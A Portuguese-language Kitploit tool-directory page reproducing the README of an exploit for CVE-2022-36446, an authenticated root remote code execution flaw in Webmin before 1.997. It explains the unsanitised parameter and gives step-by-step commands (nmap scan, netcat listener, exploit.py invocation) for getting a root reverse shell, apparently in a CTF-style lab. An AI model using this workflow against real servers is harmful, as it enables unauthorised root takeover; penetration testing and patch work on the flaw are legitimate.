Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-36446-Webmin-RCE — Exploração de execução remota de código autenticada para Webmin < 1.997 via módulo Software Package Updates. Injeta comandos arbitrários como root através de um parâmetro não sanitizado, entregando um shell reverso. | Kitploit
Ferramentas/GitHubGitHub/darnabin/cve-2022-36446-webmin-rce
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubdarnabin/cve-2022-36446-webmin-rce

CVE-2022-36446-Webmin-RCE

Exploração de execução remota de código autenticada para Webmin < 1.997 via módulo Software Package Updates. Injeta comandos arbitrários como root através de um parâmetro não sanitizado, entregando um shell reverso.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
25há 2 mesesAinda não revisado
Compartilhar

CVE-2022-36446 — Webmin < 1.997 RCE (Autenticado)

Exploit para a vulnerabilidade de Remote Code Execution no Webmin versões anteriores a 1.997, através do módulo Software Package Updates.

Como funciona?

O módulo Software Package Updates do Webmin não sanitiza corretamente o parâmetro u antes de passá-lo ao sistema. Um usuário autenticado com acesso a esse módulo pode injetar comandos arbitrários que são executados como root.


Pré-requisitos

Instale as dependências antes de executar o exploit:

pip3 install requests beautifulsoup4 lxml urllib3

Parâmetros

ParâmetroDescriçãoExemplo
-tURL do alvo (sem porta)https://192.168.1.10
-uUsuário do Webminadmin
-pSenha do Webminpassword123
-lSeu IP (onde você recebe a shell)192.168.1.5
-lpPorta onde você escuta4444

Passo a passo

1 — Identifique o IP do alvo com Nmap:

nmap -sV TARGET_IP
# Procura a porta 10000 com Webmin

2 — Abra o listener em sua máquina:

nc -lvnp 4444

3 — Em outro terminal, execute o exploit:

python3 exploit.py \
  -t https://TARGET_IP \
  -u admin \
  -p PASSWORD \
  -l TU_IP \
  -lp 4444

4 — Se o exploit for bem-sucedido, você verá:

5 — No listener você receberá uma shell como root:

# whoami
root
# cat /root/Desktop/FLAG.txt
FLAG{...}

Exemplo completo

# Terminal 1
nc -lvnp 4444

# Terminal 2
python3 exploit.py -t https://192.168.253.156 -u admin -p 'W3bm1n2024' -l 192.168.253.130 -lp 4444

Referência

  • CVE: CVE-2022-36446
  • CVSS Score: 9.9 (Crítico)
  • Versão vulnerável: Webmin < 1.997
  • Exploit original: https://www.exploit-db.com/exploits/50998
  • Autor original: Emir Polat
Baixar ferramenta